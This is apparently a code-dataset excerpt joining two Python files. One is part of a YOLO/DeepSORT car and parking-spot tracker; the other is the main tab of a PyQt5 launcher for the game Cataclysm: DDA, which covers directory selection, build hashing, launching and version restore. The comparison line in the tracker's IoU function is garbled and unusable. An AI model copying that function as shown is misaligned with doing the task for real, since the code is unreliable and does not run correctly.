self.val_list = list(self.NUM_CLASS.values())\n self.Track_only = [\"car\", \"truck\"]\n\n #Creating deep sort object, these parameters can be massaged\n max_cosine_distance = 0.7\n nn_budget = None\n model_filename = 'model_data/mars-small128.pb'\n self.encoder = gdet.create_box_encoder(model_filename, batch_size=1)\n metric = nn_matching.NearestNeighborDistanceMetric(\"cosine\", max_cosine_distance, nn_budget)\n self.tracker = Tracker(metric)\n\n #Creating our model, we can change this to other models if needed. 
Check model zoo online for more.\n vid = cv2.VideoCapture('../footage/TrimmedVid.mp4')\n width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))\n fps = int(vid.get(cv2.CAP_PROP_FPS))\n self.cvModel = Load_Yolo_model()\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n self.out = cv2.VideoWriter('../footage/TrimmedVidDemo.mp4', fourcc, fps, (width, height), 1) # output_path must be .mp4\n print(\"init carDetector\")\n\n\n def get_bounding_box_iou(self, box1, box2):\n\n left=max(box1[0], box2[0])\n top=max(box1[1], box2[1])\n right=min(box1[2], box2[2])\n bottom=min(box1[3], box2[3])\n\n if(right 0.25):\n return True\n return False\n\n def get_spots(self, spotsArray):\n i = 0\n print(self.openParkingSpots)\n for spot in spotsArray:\n self.openParkingSpots.append(spotObject(i, spot))\n i = i+1\n \n\n def matchCar(self, carID):\n if(len(self.openParkingSpots ) < 1):\n print(\"No Open Spots\")\n return\n if(carID in self.matchedCars):\n print(\"Car already matched\")\n return\n else:\n selectedSpot = self.openParkingSpots.pop()\n newMatch = (selectedSpot.index, carID)\n self.matched.append(newMatch)\n self.matchedCars.append(carID)\n self.assignedParkingSpots.append(selectedSpot)\n print(self.matched)\n\n\n def convertBbToPolygon(self, bbox):\n poly = box(bbox[0], bbox[1], bbox[2], bbox[3], True)\n return poly\n print(\"Poly\")\n\n def convertPolygonToBb(self, poly):\n print(\"Bb\")\n\n def get_cars(self, inputFrame):\n self.currFrame = inputFrame\n\n original_frame = cv2.cvtColor(self.currFrame, cv2.COLOR_BGR2RGB)\n original_frame = cv2.cvtColor(original_frame, cv2.COLOR_BGR2RGB)\n\n image_data = image_preprocess(np.copy(original_frame), [self.input_size, self.input_size])\n #image_data = tf.expand_dims(image_data, 0)\n image_data = image_data[np.newaxis, ...].astype(np.float32)\n\n #Detect cars here\n pred_bbox = self.cvModel(image_data)\n\n pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]\n pred_bbox = tf.concat(pred_bbox, axis=0)\n\n bboxes = postprocess_boxes(pred_bbox, original_frame, self.input_size, self.thresh)\n bboxes = nms(bboxes, self.iou_threshold, method='nms')\n\n # extract bboxes to boxes (x, y, width, height), scores and names\n boxes, scores, names = [], [], []\n for bbox in bboxes:\n if len(self.Track_only) !=0 and self.NUM_CLASS[int(bbox[5])] in self.Track_only or len(self.Track_only) == 0:\n boxes.append([bbox[0].astype(int), bbox[1].astype(int), bbox[2].astype(int)-bbox[0].astype(int), bbox[3].astype(int)-bbox[1].astype(int)])\n scores.append(bbox[4])\n names.append(self.NUM_CLASS[int(bbox[5])])\n\n #Match objects between frames\n finalBoxes = np.array(boxes) \n finalNames = np.array(names)\n finalScores = np.array(scores)\n features = np.array(self.encoder(original_frame, finalBoxes))\n detections = [Detection(bbox, score, class_name, feature) for bbox, score, class_name, feature in zip(finalBoxes, finalScores, finalNames, features)]\n\n self.tracker.predict()\n self.tracker.update(detections)\n\n #Set new bounding boxes with IDs\n tracked_bboxes = []\n for track in self.tracker.tracks:\n if not track.is_confirmed() or track.time_since_update > 5:\n continue \n bbox = track.to_tlbr() # Get the corrected/predicted bounding box\n class_name = track.get_class() #Get the class name of particular object\n tracking_id = track.track_id # Get the ID for the particular track\n index = self.key_list[self.val_list.index(class_name)] # Get predicted object index by object name\n tracked_bboxes.append( bbox.tolist() + 
[tracking_id, index] ) # Structure data, that we could use it with our draw_bbox function\n\n self.prevFrame = self.currFrame\n image = draw_bbox(original_frame, tracked_bboxes, CLASSES=YOLO_COCO_CLASSES, tracking=True)\n cv2.imwrite(\"../footage/newimage.jpg\", image)\n self.markSpots()\n self.boundingBoxes = tracked_bboxes\n #Return bounding boxes with carIDs to broker\n return tracked_bboxes\n\n def get_car_image(self, inputID):\n for box in self.boundingBoxes:\n if(box[4] == inputID):\n verticies = np.array( [[[box[0],box[1]],[box[2],box[1]],[box[2],box[3]],[box[0],box[3]]]], dtype=np.int32 )\n polyImage = self.currFrame.copy()\n cv2.fillPoly(polyImage, verticies, 255)\n image = cv2.addWeighted(polyImage, 0.3, self.currFrame, 0.7, 0.0)\n cv2.imwrite(\"../footage/blueSelection.jpg\", image)\n return image\n return []\n #Cross reference inputID with stored IDs\n\n #Highlight location of ID car on the inputImg\n\n #Return highlighted image to broker\n","repo_name":"vyommalhotra/parksimply","sub_path":"extractor/src/cars.py","file_name":"cars.py","file_ext":"py","file_size_in_byte":9952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6856161016","text":"import hashlib\nimport html\nimport json\nimport logging\nimport os\nimport re\nimport shutil\nimport stat\nimport subprocess\nimport sys\nimport tempfile\nimport zipfile\nimport random\n\nfrom collections import deque\nfrom datetime import datetime, timedelta\nfrom io import BytesIO, TextIOWrapper\nfrom os import scandir\nfrom pathlib import Path\nfrom urllib.parse import urljoin\n\nimport arrow\nfrom PyQt5.QtCore import (\n Qt, QTimer, QUrl, QFileInfo, pyqtSignal, QStringListModel, QThread, QRegularExpression\n)\nfrom PyQt5.QtNetwork import QNetworkAccessManager, QNetworkRequest\nfrom PyQt5.QtWidgets import (\n QApplication, QWidget, QGridLayout, QGroupBox, QVBoxLayout, QLabel, QLineEdit,\n QPushButton, QFileDialog, QToolButton, QProgressBar, QButtonGroup, QRadioButton,\n QComboBox, QTextBrowser, QMessageBox, QStyle, QHBoxLayout, QSizePolicy\n)\nfrom PyQt5.QtGui import QRegularExpressionValidator\nfrom babel.dates import format_datetime\nfrom pywintypes import error as PyWinError\n\nimport cddagl.constants as cons\nfrom cddagl.constants import get_cddagl_path, get_cdda_uld_path\nfrom cddagl import __version__ as version\nfrom cddagl.functions import (\n tryint, move_path, is_64_windows, sizeof_fmt, delete_path,\n clean_qt_path, unique, log_exception, ensure_slash, safe_humanize\n)\nfrom cddagl.i18n import proxy_ngettext as ngettext, proxy_gettext as _\nfrom cddagl.sql.functions import (\n get_config_value, set_config_value, new_version, get_build_from_sha256,\n new_build, config_true\n)\nfrom cddagl.win32 import (\n find_process_with_file_handle, activate_window, process_id_from_path, wait_for_pid,\n get_documents_directory\n)\n\nlogger = logging.getLogger('cddagl')\n\n\nclass MainTab(QWidget):\n def __init__(self):\n super(MainTab, self).__init__()\n\n game_dir_group_box = GameDirGroupBox()\n self.game_dir_group_box = game_dir_group_box\n\n update_group_box = UpdateGroupBox()\n self.update_group_box = update_group_box\n\n layout = QVBoxLayout()\n layout.addWidget(game_dir_group_box)\n layout.addWidget(update_group_box)\n self.setLayout(layout)\n\n def set_text(self):\n self.game_dir_group_box.set_text()\n self.update_group_box.set_text()\n\n def get_main_window(self):\n return self.parentWidget().parentWidget().parentWidget()\n\n def get_settings_tab(self):\n return 
self.parentWidget().parentWidget().settings_tab\n\n def get_soundpacks_tab(self):\n return self.parentWidget().parentWidget().soundpacks_tab\n\n def get_mods_tab(self):\n return self.parentWidget().parentWidget().mods_tab\n\n def get_backups_tab(self):\n return self.parentWidget().parentWidget().backups_tab\n\n def disable_tab(self):\n self.game_dir_group_box.disable_controls()\n self.update_group_box.disable_controls(True)\n\n def enable_tab(self):\n self.game_dir_group_box.enable_controls()\n self.update_group_box.enable_controls()\n\n\nclass GameDirGroupBox(QGroupBox):\n def __init__(self):\n super(GameDirGroupBox, self).__init__()\n\n self.shown = False\n self.exe_path = None\n self.restored_previous = False\n self.current_build = None\n\n self.exe_reading_timer = None\n self.update_saves_timer = None\n self.saves_size = 0\n\n self.dir_combo_inserting = False\n\n self.game_process = None\n self.game_process_id = None\n self.game_started = False\n\n layout = QGridLayout()\n\n dir_label = QLabel()\n layout.addWidget(dir_label, 0, 0, Qt.AlignRight)\n self.dir_label = dir_label\n\n self.layout_dir = QHBoxLayout()\n layout.addLayout(self.layout_dir, 0, 1)\n\n self.dir_combo = QComboBox()\n self.layout_dir.addWidget(self.dir_combo)\n self.dir_combo.setEditable(True)\n self.dir_combo.setInsertPolicy(QComboBox.InsertAtTop)\n self.dir_combo.currentIndexChanged.connect(self.dc_index_changed)\n self.dir_combo.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Minimum)\n game_directories = json.loads(get_config_value('game_directories', '[]'))\n self.dir_combo_model = QStringListModel(game_directories, self)\n self.dir_combo.setModel(self.dir_combo_model)\n\n dir_change_button = QToolButton()\n self.layout_dir.addWidget(dir_change_button)\n dir_change_button.setText('...')\n dir_change_button.clicked.connect(self.set_game_directory)\n self.dir_change_button = dir_change_button\n\n self.dir_state_icon = QLabel()\n self.layout_dir.addWidget(self.dir_state_icon)\n self.dir_state_icon.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Minimum)\n self.dir_state_icon.hide()\n\n version_label = QLabel()\n layout.addWidget(version_label, 1, 0, Qt.AlignRight)\n self.version_label = version_label\n\n version_value_label = QLineEdit()\n version_value_label.setReadOnly(True)\n layout.addWidget(version_value_label, 1, 1)\n self.version_value_label = version_value_label\n\n build_label = QLabel()\n layout.addWidget(build_label, 2, 0, Qt.AlignRight)\n self.build_label = build_label\n\n build_value_label = QLineEdit()\n build_value_label.setReadOnly(True)\n build_value_label.setText(_('Unknown'))\n layout.addWidget(build_value_label, 2, 1)\n self.build_value_label = build_value_label\n\n saves_label = QLabel()\n layout.addWidget(saves_label, 3, 0, Qt.AlignRight)\n self.saves_label = saves_label\n\n saves_value_edit = QLineEdit()\n saves_value_edit.setReadOnly(True)\n saves_value_edit.setText(_('Unknown'))\n layout.addWidget(saves_value_edit, 3, 1)\n self.saves_value_edit = saves_value_edit\n\n saves_warning_label = QLabel()\n icon = QApplication.style().standardIcon(QStyle.SP_MessageBoxWarning)\n saves_warning_label.setPixmap(icon.pixmap(16, 16))\n saves_warning_label.hide()\n layout.addWidget(saves_warning_label, 3, 2)\n self.saves_warning_label = saves_warning_label\n\n buttons_container = QWidget()\n buttons_layout = QGridLayout()\n buttons_layout.setContentsMargins(0, 0, 0, 0)\n buttons_container.setLayout(buttons_layout)\n\n launch_game_button = QPushButton()\n launch_game_button.setEnabled(False)\n 
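# disabled by default; enable_controls() re-enables it once a valid game executable is found\n        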
launch_game_button.setStyleSheet(\"font-size: 20px;\")\n launch_game_button.clicked.connect(self.launch_game)\n buttons_layout.addWidget(launch_game_button, 0, 0, 1, 3)\n self.launch_game_button = launch_game_button\n\n restore_button = QPushButton()\n restore_button.setEnabled(False)\n restore_button.clicked.connect(self.restore_previous)\n buttons_layout.addWidget(restore_button, 0, 3, 1, 1)\n self.restore_button = restore_button\n\n layout.addWidget(buttons_container, 4, 0, 1, 3)\n self.buttons_container = buttons_container\n self.buttons_layout = buttons_layout\n\n self.setLayout(layout)\n self.set_text()\n\n def set_text(self):\n self.dir_label.setText(_('Directory:'))\n self.version_label.setText(_('Version:'))\n self.build_label.setText(_('Build:'))\n self.saves_label.setText(_('Saves:'))\n self.saves_warning_label.setToolTip(\n _('Your save directory might be large '\n 'enough to cause significant delays during the update process.\\n'\n 'You might want to enable the \"Do not copy or move the save '\n 'directory\" option in the settings tab.'))\n self.launch_game_button.setText(_('Launch game'))\n self.restore_button.setText(_('Restore previous version'))\n self.setTitle(_('Game'))\n\n def set_dir_state_icon(self, state):\n style = QApplication.style()\n if state == 'critical':\n icon = style.standardIcon(QStyle.SP_MessageBoxCritical).pixmap(16, 16)\n elif state == 'warning':\n icon = style.standardIcon(QStyle.SP_MessageBoxWarning).pixmap(16, 16)\n elif state == 'ok':\n icon = style.standardIcon(QStyle.SP_DialogApplyButton).pixmap(16, 16)\n elif state == 'hide':\n self.dir_state_icon.hide()\n return\n\n self.dir_state_icon.setPixmap(icon)\n self.dir_state_icon.show()\n\n def showEvent(self, event):\n if not self.shown:\n self.shown = True\n\n self.last_game_directory = None\n\n game_directory = get_config_value('game_directory')\n if game_directory is None:\n documents_path = get_documents_directory()\n default_dir = os.path.join(documents_path, 'cdda')\n game_directory = default_dir\n\n self.set_dir_combo_value(game_directory)\n\n self.game_directory_changed()\n\n self.shown = True\n\n def set_dir_combo_value(self, value):\n dir_model = self.dir_combo.model()\n\n index_list = dir_model.match(dir_model.index(0, 0), Qt.DisplayRole,\n value, 1, Qt.MatchFixedString)\n if len(index_list) > 0:\n self.dir_combo.setCurrentIndex(index_list[0].row())\n else:\n self.dir_combo_inserting = True\n self.dir_combo.insertItem(0, value)\n self.dir_combo_inserting = False\n\n self.dir_combo.setCurrentIndex(0)\n\n def disable_controls(self):\n self.dir_combo.setEnabled(False)\n self.dir_change_button.setEnabled(False)\n\n self.launch_game_button.setEnabled(False)\n self.restore_button.setEnabled(False)\n\n def enable_controls(self):\n self.dir_combo.setEnabled(True)\n self.dir_change_button.setEnabled(True)\n\n self.launch_game_button.setEnabled(\n self.exe_path is not None and os.path.isfile(self.exe_path))\n\n directory = self.dir_combo.currentText()\n previous_version_dir = os.path.join(directory, 'previous_version')\n self.restore_button.setEnabled(os.path.isdir(previous_version_dir))\n\n def restore_previous(self):\n self.disable_controls()\n\n main_tab = self.get_main_tab()\n update_group_box = main_tab.update_group_box\n update_group_box.disable_controls(True)\n\n self.restored_previous = False\n\n try:\n game_dir = self.dir_combo.currentText()\n previous_version_dir = os.path.join(game_dir, 'previous_version')\n\n if os.path.isdir(previous_version_dir) and os.path.isdir(game_dir):\n\n with 
tempfile.TemporaryDirectory(prefix=cons.TEMP_PREFIX\n ) as temp_move_dir:\n\n excluded_entries = set(['previous_version'])\n if config_true(get_config_value('prevent_save_move',\n 'False')):\n excluded_entries.add('save')\n\n # Prevent moving the launcher if it's in the game directory\n launcher_exe = os.path.abspath(sys.executable)\n launcher_dir = os.path.dirname(launcher_exe)\n if os.path.abspath(game_dir) == launcher_dir:\n excluded_entries.add(os.path.basename(launcher_exe))\n\n for entry in os.listdir(game_dir):\n if entry not in excluded_entries:\n entry_path = os.path.join(game_dir, entry)\n shutil.move(entry_path, temp_move_dir)\n\n excluded_entries = set()\n if config_true(get_config_value('prevent_save_move', 'False')):\n excluded_entries.add('save')\n for entry in os.listdir(previous_version_dir):\n if entry not in excluded_entries:\n entry_path = os.path.join(previous_version_dir, entry)\n shutil.move(entry_path, game_dir)\n\n for entry in os.listdir(temp_move_dir):\n entry_path = os.path.join(temp_move_dir, entry)\n shutil.move(entry_path, previous_version_dir)\n\n self.restored_previous = True\n except OSError as e:\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.showMessage(str(e))\n\n self.last_game_directory = None\n self.enable_controls()\n update_group_box.enable_controls()\n self.game_directory_changed()\n\n def focus_game(self):\n if self.game_process is None and self.game_process_id is None:\n return\n\n if self.game_process is not None:\n pid = self.game_process.pid\n elif self.game_process_id is not None:\n pid = self.game_process_id\n\n try:\n activate_window(pid)\n except (OSError, PyWinError):\n # Can't activate window, we will assume that the game ended\n self.game_ended()\n\n def launch_game(self):\n if self.game_started:\n return self.focus_game()\n\n if config_true(get_config_value('backup_on_launch', 'False')):\n main_tab = self.get_main_tab()\n backups_tab = main_tab.get_backups_tab()\n\n backups_tab.prune_auto_backups()\n\n name = '{auto}_{name}'.format(auto=_('auto'),\n name=_('before_launch'))\n\n backups_tab.after_backup = self.launch_game_process\n backups_tab.backup_saves(name)\n else:\n self.launch_game_process()\n\n def launch_game_process(self):\n if self.exe_path is None or not os.path.isfile(self.exe_path):\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.showMessage(_('Game executable not found'))\n\n self.launch_game_button.setEnabled(False)\n return\n\n self.get_main_window().setWindowState(Qt.WindowMinimized)\n exe_dir = os.path.dirname(self.exe_path)\n\n params = get_config_value('command.params', '').strip()\n if params != '':\n params = ' ' + params\n\n cmd = '\"{exe_path}\"{params}'.format(exe_path=self.exe_path,\n params=params)\n\n try:\n game_process = subprocess.Popen(cmd, cwd=exe_dir,\n creationflags=subprocess.CREATE_NEW_PROCESS_GROUP)\n except OSError as e:\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.showMessage(_('Could not launch the game executable'))\n\n error_msgbox = QMessageBox()\n error_msgbox.setWindowTitle(_('Cannot launch game'))\n\n text = _('''\n
The launcher failed to start the game executable in {filename}.\n\nIt received the following error from the operating system: {error}\n\nPoor antivirus products are known to detect the game binary as a threat and\nblock its execution. A simple workaround is to add the game binary in your\nantivirus whitelist or select the action to trust this binary when detected.
    \n''').format(\n filename=html.escape(e.filename or _('[unknown]')),\n error=html.escape(e.strerror))\n\n error_msgbox.setText(text)\n error_msgbox.addButton(_('OK'), QMessageBox.YesRole)\n error_msgbox.setIcon(QMessageBox.Critical)\n\n error_msgbox.exec()\n return\n\n self.game_process = game_process\n self.game_started = True\n\n if not config_true(get_config_value('keep_launcher_open', 'False')):\n self.get_main_window().close()\n else:\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.showMessage(_('Game process is running'))\n\n main_tab = self.get_main_tab()\n update_group_box = main_tab.update_group_box\n\n self.disable_controls()\n update_group_box.disable_controls(True)\n\n soundpacks_tab = main_tab.get_soundpacks_tab()\n mods_tab = main_tab.get_mods_tab()\n settings_tab = main_tab.get_settings_tab()\n backups_tab = main_tab.get_backups_tab()\n\n soundpacks_tab.disable_tab()\n mods_tab.disable_tab()\n settings_tab.disable_tab()\n backups_tab.disable_tab()\n\n self.launch_game_button.setText(_('Show current game'))\n self.launch_game_button.setEnabled(True)\n\n class ProcessWaitThread(QThread):\n ended = pyqtSignal()\n\n def __init__(self, process):\n super(ProcessWaitThread, self).__init__()\n\n self.process = process\n\n def __del__(self):\n self.wait()\n\n def run(self):\n self.process.wait()\n self.ended.emit()\n\n def process_ended():\n self.game_ended()\n\n process_wait_thread = ProcessWaitThread(self.game_process)\n process_wait_thread.ended.connect(process_ended)\n process_wait_thread.start()\n\n self.process_wait_thread = process_wait_thread\n\n def game_ended(self):\n if self.process_wait_thread is not None:\n self.process_wait_thread.quit()\n self.process_wait_thread = None\n\n self.game_process = None\n self.game_started = False\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.showMessage(_('Game process has ended'))\n\n main_tab = self.get_main_tab()\n update_group_box = main_tab.update_group_box\n\n soundpacks_tab = main_tab.get_soundpacks_tab()\n mods_tab = main_tab.get_mods_tab()\n settings_tab = main_tab.get_settings_tab()\n backups_tab = main_tab.get_backups_tab()\n\n self.enable_controls()\n update_group_box.enable_controls()\n\n soundpacks_tab.enable_tab()\n mods_tab.enable_tab()\n settings_tab.enable_tab()\n backups_tab.enable_tab()\n\n self.launch_game_button.setText(_('Launch game'))\n\n self.get_main_window().setWindowState(Qt.WindowActive)\n\n self.update_saves()\n\n if config_true(get_config_value('backup_on_end', 'False')):\n backups_tab.prune_auto_backups()\n\n name = '{auto}_{name}'.format(auto=_('auto'),\n name=_('after_end'))\n\n backups_tab.backup_saves(name)\n\n def get_main_tab(self):\n return self.parentWidget()\n\n def get_main_window(self):\n return self.get_main_tab().get_main_window()\n\n def update_soundpacks(self):\n main_window = self.get_main_window()\n central_widget = main_window.central_widget\n soundpacks_tab = central_widget.soundpacks_tab\n\n directory = self.dir_combo.currentText()\n soundpacks_tab.game_dir_changed(directory)\n\n def update_mods(self):\n main_window = self.get_main_window()\n central_widget = main_window.central_widget\n mods_tab = central_widget.mods_tab\n\n directory = self.dir_combo.currentText()\n mods_tab.game_dir_changed(directory)\n\n def update_backups(self):\n main_window = self.get_main_window()\n central_widget = main_window.central_widget\n backups_tab = central_widget.backups_tab\n\n directory = 
self.dir_combo.currentText()\n backups_tab.game_dir_changed(directory)\n\n def clear_soundpacks(self):\n main_window = self.get_main_window()\n central_widget = main_window.central_widget\n soundpacks_tab = central_widget.soundpacks_tab\n\n soundpacks_tab.clear_soundpacks()\n\n def clear_mods(self):\n main_window = self.get_main_window()\n central_widget = main_window.central_widget\n mods_tab = central_widget.mods_tab\n\n mods_tab.clear_mods()\n\n def clear_backups(self):\n main_window = self.get_main_window()\n central_widget = main_window.central_widget\n backups_tab = central_widget.backups_tab\n\n backups_tab.clear_backups()\n\n def set_game_directory(self):\n options = QFileDialog.DontResolveSymlinks | QFileDialog.ShowDirsOnly\n directory = QFileDialog.getExistingDirectory(self,\n _('Game directory'), self.dir_combo.currentText(),\n options=options)\n if directory:\n self.set_dir_combo_value(clean_qt_path(directory))\n\n def dc_index_changed(self, index):\n if self.shown and not self.dir_combo_inserting:\n self.game_directory_changed()\n\n def game_directory_changed(self):\n directory = self.dir_combo.currentText()\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n status_bar.clearMessage()\n self.set_dir_state_icon('hide')\n\n self.exe_path = None\n\n main_tab = self.get_main_tab()\n update_group_box = main_tab.update_group_box\n\n dir_state = None\n if ensure_slash(get_cddagl_path()).startswith(ensure_slash(directory)):\n dir_state = 'critical'\n self.set_dir_state_icon(dir_state)\n self.version_value_label.setText(\n _('Unknown version - Reason:') + ' ' +\n _('CDDA Game Launcher files cannot be inside Game directory!')\n )\n elif os.path.isfile(directory):\n dir_state = 'critical'\n self.set_dir_state_icon(dir_state)\n self.version_value_label.setText(\n _('Unknown version - Reason:') + ' ' +\n _('Game directory was set to a file!')\n )\n elif not os.path.isdir(directory):\n dir_state = 'warning'\n self.set_dir_state_icon(dir_state)\n self.version_value_label.setText(\n _('Unknown version - Reason:') + ' ' +\n _(\"Game directory doesn't exist, Game is not installed here.\")\n )\n else:\n # Check for previous version\n previous_version_dir = os.path.join(directory, 'previous_version')\n self.restore_button.setEnabled(os.path.isdir(previous_version_dir))\n\n # Find the executable\n console_exe = os.path.join(directory, 'cataclysm.exe')\n tiles_exe = os.path.join(directory, 'cataclysm-tiles.exe')\n\n exe_path = None\n version_type = None\n if os.path.isfile(console_exe):\n version_type = _('console')\n exe_path = console_exe\n elif os.path.isfile(tiles_exe):\n version_type = _('tiles')\n exe_path = tiles_exe\n\n if version_type is None:\n dir_state = 'warning'\n self.set_dir_state_icon(dir_state)\n self.version_value_label.setText(\n _('Unknown version - Reason:') + ' ' +\n _(\"Game is not installed in this directory.\")\n )\n else:\n dir_state = 'ok'\n self.exe_path = exe_path\n self.version_type = version_type\n if self.last_game_directory != directory:\n self.version_value_label.setText(_('Analyzing...'))\n self.build_value_label.setText(_('Analyzing...'))\n self.saves_value_edit.setText(_('Analyzing...'))\n self.update_version()\n self.update_saves()\n self.update_soundpacks()\n self.update_mods()\n self.update_backups()\n\n if self.exe_path is None:\n self.launch_game_button.setEnabled(False)\n update_group_box.update_button.setText(_('Install game'))\n update_group_box.update_button.setEnabled(dir_state != 'critical')\n\n self.restored_previous = 
False\n\n self.current_build = None\n self.build_value_label.setText(_('Unknown'))\n self.saves_value_edit.setText(_('Unknown'))\n self.clear_soundpacks()\n self.clear_mods()\n self.clear_backups()\n else:\n self.launch_game_button.setEnabled(True)\n update_group_box.update_button.setText(_('Update game'))\n update_group_box.update_button.setEnabled(dir_state == 'ok')\n\n self.check_running_process(self.exe_path)\n\n self.last_game_directory = directory\n \n set_config_value('game_directory', directory)\n\n @property\n def app_locale(self):\n return QApplication.instance().app_locale\n\n def update_version(self):\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n if (self.exe_reading_timer is not None\n and self.exe_reading_timer.isActive()):\n self.exe_reading_timer.stop()\n\n status_bar = main_window.statusBar()\n status_bar.removeWidget(self.reading_label)\n status_bar.removeWidget(self.reading_progress_bar)\n\n status_bar.busy -= 1\n\n status_bar.clearMessage()\n status_bar.busy += 1\n\n reading_label = QLabel()\n reading_label.setText(_('Reading: {0}').format(self.exe_path))\n status_bar.addWidget(reading_label, 100)\n self.reading_label = reading_label\n\n progress_bar = QProgressBar()\n status_bar.addWidget(progress_bar)\n self.reading_progress_bar = progress_bar\n\n timer = QTimer(self)\n self.exe_reading_timer = timer\n\n exe_size = os.path.getsize(self.exe_path)\n\n progress_bar.setRange(0, exe_size)\n self.exe_total_read = 0\n\n self.exe_sha256 = hashlib.sha256()\n self.game_version = ''\n\n game_dir = self.dir_combo.currentText()\n version_file = os.path.join(game_dir, 'VERSION.txt')\n if os.path.isfile(version_file):\n file_content = None\n with open(version_file, 'r', encoding='utf8') as read_file:\n file_content = read_file.read(1024)\n if file_content is not None:\n match = re.search(r'commit sha: (?P\\S+)', file_content)\n if match:\n commit_sha = match.group('commitsha')\n if len(commit_sha) >= 7:\n self.game_version = commit_sha[:7]\n \n self.opened_exe = open(self.exe_path, 'rb')\n\n def timeout():\n bytes = self.opened_exe.read(cons.READ_BUFFER_SIZE)\n if len(bytes) == 0:\n self.opened_exe.close()\n self.exe_reading_timer.stop()\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.removeWidget(self.reading_label)\n status_bar.removeWidget(self.reading_progress_bar)\n\n status_bar.busy -= 1\n if status_bar.busy == 0 and not self.game_started:\n if self.restored_previous:\n status_bar.showMessage(\n _('Previous version restored'))\n else:\n status_bar.showMessage(_('Ready'))\n\n if status_bar.busy == 0 and self.game_started:\n status_bar.showMessage(_('Game process is running'))\n\n sha256 = self.exe_sha256.hexdigest()\n\n stable_version = cons.STABLE_SHA256.get(sha256, None)\n is_stable = stable_version is not None\n\n if is_stable:\n self.game_version = stable_version\n \n if self.game_version == '':\n self.game_version = _('Unknown')\n else:\n self.add_game_dir()\n\n self.version_value_label.setText(\n '{version} ({type})'\n .format(version=self.game_version, type=self.version_type)\n )\n\n new_version(self.game_version, sha256, is_stable)\n\n build = get_build_from_sha256(sha256)\n\n if build is not None:\n build_date = arrow.get(build['released_on'], 'UTC')\n human_delta = safe_humanize(build_date, arrow.utcnow(), locale=self.app_locale)\n self.build_value_label.setText(\n '{build} ({time_delta})'\n .format(build=build['build'], time_delta=human_delta)\n )\n self.current_build = 
build['build']\n\n main_tab = self.get_main_tab()\n update_group_box = main_tab.update_group_box\n\n if (update_group_box.builds is not None\n and len(update_group_box.builds) > 0\n and status_bar.busy == 0\n and not self.game_started):\n last_build = update_group_box.builds[0]\n\n message = status_bar.currentMessage()\n if message != '':\n message = message + ' - '\n\n if last_build['number'] == self.current_build:\n message = message + _('Your game is up to date')\n else:\n message = message + _('There is a new update available')\n status_bar.showMessage(message)\n\n else:\n self.build_value_label.setText(_('Unknown'))\n self.current_build = None\n\n else:\n self.exe_total_read += len(bytes)\n self.reading_progress_bar.setValue(self.exe_total_read)\n self.exe_sha256.update(bytes)\n\n timer.timeout.connect(timeout)\n timer.start(0)\n\n def check_running_process(self, exe_path):\n pid = process_id_from_path(exe_path)\n\n if pid is not None:\n self.game_started = True\n self.game_process_id = pid\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n if status_bar.busy == 0:\n status_bar.showMessage(_('Game process is running'))\n\n main_tab = self.get_main_tab()\n update_group_box = main_tab.update_group_box\n\n self.disable_controls()\n update_group_box.disable_controls(True)\n\n soundpacks_tab = main_tab.get_soundpacks_tab()\n mods_tab = main_tab.get_mods_tab()\n settings_tab = main_tab.get_settings_tab()\n backups_tab = main_tab.get_backups_tab()\n\n soundpacks_tab.disable_tab()\n mods_tab.disable_tab()\n settings_tab.disable_tab()\n backups_tab.disable_tab()\n\n self.launch_game_button.setText(_('Show current game'))\n self.launch_game_button.setEnabled(True)\n\n class ProcessWaitThread(QThread):\n ended = pyqtSignal()\n\n def __init__(self, pid):\n super(ProcessWaitThread, self).__init__()\n\n self.pid = pid\n\n def __del__(self):\n self.wait()\n\n def run(self):\n wait_for_pid(self.pid)\n self.ended.emit()\n\n def process_ended():\n self.process_wait_thread = None\n\n self.game_process_id = None\n self.game_started = False\n\n status_bar.showMessage(_('Game process has ended'))\n\n self.enable_controls()\n update_group_box.enable_controls()\n\n soundpacks_tab.enable_tab()\n mods_tab.enable_tab()\n settings_tab.enable_tab()\n backups_tab.enable_tab()\n\n self.launch_game_button.setText(_('Launch game'))\n\n self.get_main_window().setWindowState(Qt.WindowActive)\n\n self.update_saves()\n\n if config_true(get_config_value('backup_on_end', 'False')):\n backups_tab.prune_auto_backups()\n\n name = '{auto}_{name}'.format(auto=_('auto'),\n name=_('after_end'))\n\n backups_tab.backup_saves(name)\n\n process_wait_thread = ProcessWaitThread(self.game_process_id)\n process_wait_thread.ended.connect(process_ended)\n process_wait_thread.start()\n\n self.process_wait_thread = process_wait_thread\n\n def add_game_dir(self):\n new_game_dir = self.dir_combo.currentText()\n\n game_dirs = json.loads(get_config_value('game_directories', '[]'))\n\n try:\n index = game_dirs.index(new_game_dir)\n if index > 0:\n del game_dirs[index]\n game_dirs.insert(0, new_game_dir)\n except ValueError:\n game_dirs.insert(0, new_game_dir)\n\n if len(game_dirs) > cons.MAX_GAME_DIRECTORIES:\n del game_dirs[cons.MAX_GAME_DIRECTORIES:]\n\n set_config_value('game_directories', json.dumps(game_dirs))\n\n def update_saves(self):\n self.game_dir = self.dir_combo.currentText()\n\n if (self.update_saves_timer is not None and self.update_saves_timer.isActive()):\n self.update_saves_timer.stop()\n 
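# a previous scan is still in flight: cancel it and reset the label before rescanning\n            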
